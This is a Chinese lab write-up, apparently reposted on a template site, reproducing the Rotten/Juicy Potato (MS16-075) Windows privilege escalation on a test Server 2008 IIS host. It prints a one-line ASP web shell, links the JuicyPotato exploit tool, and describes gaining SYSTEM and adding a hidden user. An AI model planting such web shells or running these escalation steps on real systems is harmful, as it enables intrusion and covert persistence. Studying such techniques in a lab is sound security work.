Windows烂土豆提权复现(MS16-075)

这篇具有很好参考价值的文章主要介绍了Windows烂土豆提权复现(MS16-075)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

        烂土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户,当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。攻击者登录系统后,运行一个经特殊设计的应用程序利用此漏洞,从而控制受影响的系统。
        影响版本:Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012 等,以上版本系统若未安装相应补丁,则大概率存在此漏洞。

提权原理

  1. 欺骗 “NT AUTHORITY\\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。
  2. 对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。
  3. 模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
  4. 重点是模拟令牌,在提权的过程中,我们最好已经获得了一个具有SeImpersonate权限或其他同等权限的账户,通常Windows中的许多服务具有此权限(IIS和SQL Server等)

实验环境搭建

漏洞主机:Windows Server 2008 + IIS服务器 

复现步骤

  • 安装好一台Windows Server 2008的虚拟机,然后再添加Web 服务器(IIS)

Windows烂土豆提权复现(MS16-075)

  • 安装完成后,再进入到网站的默认目录下,创建一个upload 的文件夹,并且给与everyone都可以执行的权限

Windows烂土豆提权复现(MS16-075)

  • 然后再到upload文件下创建一个.asp的木马文件,用于菜刀连接(模拟上传木马)
<%execute request("a")%>

Windows烂土豆提权复现(MS16-075)

  • 木马上传成功后就直接用菜刀连接,接下来使用命令行查看当前用户的权限,​ 此处发现其拥有SeImpersonate权限

Windows烂土豆提权复现(MS16-075)

  • 接下来使用菜刀上传漏洞的利用工具:JuicyPotatoweb.exe
https://github.com/shanfenglan/test/tree/master/juicypotato

Windows烂土豆提权复现(MS16-075)

  • 上传成功后,然后使用JuicyPotatoweb.exe执行如下命令进行提权

Windows烂土豆提权复现(MS16-075)

  • 看到成功执行,并且是以system的权限来执行whoami的,那就继续通过这个命令行,创建一个隐藏用户

Windows烂土豆提权复现(MS16-075)

  • 创建成功后,直接使用隐藏用户来登录

Windows烂土豆提权复现(MS16-075)文章来源地址https://www.toymoban.com/news/detail-498751.html

到了这里,关于Windows烂土豆提权复现(MS16-075)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Linux提权—脏牛漏洞(CVE-2016-5195)复现

    脏牛漏洞:         脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:        【影响版本】:该漏洞在全版本Linux系统(Linux kernel = 2.6.22)均可

    2024年02月15日
    浏览(40)
  • CVE-2010-2883-PDF漏洞提权复现过程

    第二步,打开Kali Linux渗透机使用命令msfconsole进入Metasploit渗透测试平台,使用模块adobe_cooltype_sing生成木马文件。 输入search adobe_cooltype_sing命令搜索Adobe渗透模块   与漏洞相关的模块有两个,编号为0的模块是使用本地的服务器挂载木马文件的模块,编号为1的模块是生成木马文

    2024年02月10日
    浏览(33)
  • Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现

    Kali版本:2022.3 目标主机ip:192.168.186.148 攻击机ip:192.168.186.147 vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式 登陆界面如下,此时账户密码未知

    2024年01月21日
    浏览(33)
  • MS14-068漏洞复现

    该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后该域用户就可以控制整个域的所有机器了。 全部版本Windows服务器 域控没有打MS14-068的补丁(KB3011780) 拿

    2024年02月07日
    浏览(38)
  • 【MS14-068漏洞复现】

    ms14-068漏洞主要通过伪造域控管理员的TGT,将普通用户权限提权为域控管理员权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。 在本地搭建的环境 win-7作为域成员主机 IP:10.40.2.10 win-2008作为域控 IP:10.40.2.20 1、

    2024年02月06日
    浏览(73)
  • ms12-020(蓝屏攻击漏洞复现)

    ✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆 🔥系列专栏 :内网安全-漏洞复现 📃新人博主 :欢迎点赞收藏关注,会回访! 💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心

    2024年01月24日
    浏览(30)
  • 复现永恒之蓝[MS17_010]

    目录 准备靶机 测试ping连通性 攻击漏洞 利用漏洞 1台kali,1台win7 win7系统可以在MSDN镜像网站里获取 注:将win7安装好,win7无法安装vmtools,若升级系统,可能会把永恒之蓝补丁打上,所以建议别升级系统     win7的IP地址为192.168.164.129  kali的IP地址为192.168.164.130 将这两台机器互

    2024年02月01日
    浏览(30)
  • 永恒之蓝(MS17-010)漏洞复现

    目录 漏洞简介 漏洞描述 影响版本 复现环境 攻击机 IP:192.168.109.132 靶机 IP:192.168.109.130 开启远程设置 卸载全部安全补丁 复现过程 一、主机发现 二、打开metasploit工具 三、使用msf搜寻MS17-010漏洞 四、使用MS17-010扫描模块,对靶机进行扫描 1.使用扫描模块 2.查看模块需要配置

    2024年02月13日
    浏览(41)
  • ms17-010(永恒之蓝)漏洞复现

    目录 前言 一、了解渗透测试流程  二、使用nmap工具对win7进行扫描 三、尝试ms17-010漏洞利用 四、结果展示 总结 🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。 💡本文由Filotimo__✍️原创,首发于CSDN📚。 📣如需转载,请事先与我联系以获得授

    2024年02月09日
    浏览(30)
  • 漏洞复现-永恒之蓝(MS17-010)

    目录 一,漏洞介绍 1,永恒之蓝是什么? 2,漏洞原理 3,影响版本 二,实验环境 三,漏洞复现 四,利用exploit模块进行渗透          永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”

    2024年02月13日
    浏览(61)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包